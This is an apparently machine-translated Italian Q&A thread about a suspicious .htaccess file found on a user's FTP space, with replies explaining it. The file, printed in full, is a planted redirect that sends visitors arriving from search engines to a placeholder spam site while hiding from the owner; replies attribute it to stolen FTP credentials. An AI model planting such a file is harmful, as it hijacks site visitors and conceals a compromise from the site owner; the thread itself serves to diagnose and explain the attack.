File .htaccess sospetto


20

Questo è stato caricato in una delle mie cartelle FTP. Non ho familiarità con Apache, ma sono ancora curioso: qualcuno può dirmi che tipo di atto sgarbato questo file sta provando a commettere? Grazie!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]

1
SIMPATICO! (In un modo malvagio ...) Praticamente sta prendendo tutti coloro che stanno arrivando al tuo sito da un motore di ricerca e li stanno reindirizzando a SPAMMER.info
KPWINC,

Mi è successo una volta. Il .htaccessfile aggiunto al mio sito aveva circa 40 righe vuote in alto, solo per confondermi ulteriormente.
TRiG

Risposte:


15

Ciò invia gli utenti che provengono da un motore di ricerca all'ultimo sito SPAMMER.info(vedere la cronologia delle domande per il sito reale ).

Sembra per referenti nel tentativo di nascondere da te , dal momento che probabilmente non accede al sito attraverso i motori di ricerca. Cioè, se vai direttamente all'URL, tutto sembra normale. Tuttavia, se entri tramite un motore di ricerca, verrai reindirizzato.

Nota: ciò non influisce sui crawler Web in quanto ( almeno googlebot ) non impostano l'intestazione del referrer.


8

Ogni volta che un utente da un motore di ricerca qualsiasi pagina del tuo sito, verrà reindirizzato al sito di spam .info.

È molto subdolo - non noterai nulla di sbagliato in quanto normalmente digiti semplicemente l'indirizzo.


1
Dal momento che sta guardando il referrer, non reindirizzerà alcun clic proveniente da un motore di ricerca?

Non influisce anche sui collegamenti da Google? Ad esempio, cerchi il sito del PO su Google, fai clic su di esso e verrai reindirizzato da quando vieni da Google?

Sì, collegamenti solo dai motori di ricerca (come ho detto nella mia risposta) ma non dai crawler / robot dei motori di ricerca. Questa risposta è stata aggiornata, quindi ora è corretta. Inizialmente indicava che ciò si applicava solo ai robot.
Michael Haren,

1

per aggiungere altro - molto probabilmente le tue credenziali ftp sono trapelate. forse li hai salvati in filezilla / total commander ecc. c'è un sacco di malware che li ruba e poi 'va' in giro - accedendo ad account ftp, collegando javascript dannoso a index.php / html o mettendo file di riscrittura simili.


Sto affrontando questo problema. Il giorno dopo l'altro file .htaccess viene modificato con conseguente errore interno del server.
vnix27,
Utilizzando il nostro sito, riconosci di aver letto e compreso le nostre Informativa sui cookie e Informativa sulla privacy.
Licensed under cc by-sa 3.0 with attribution required.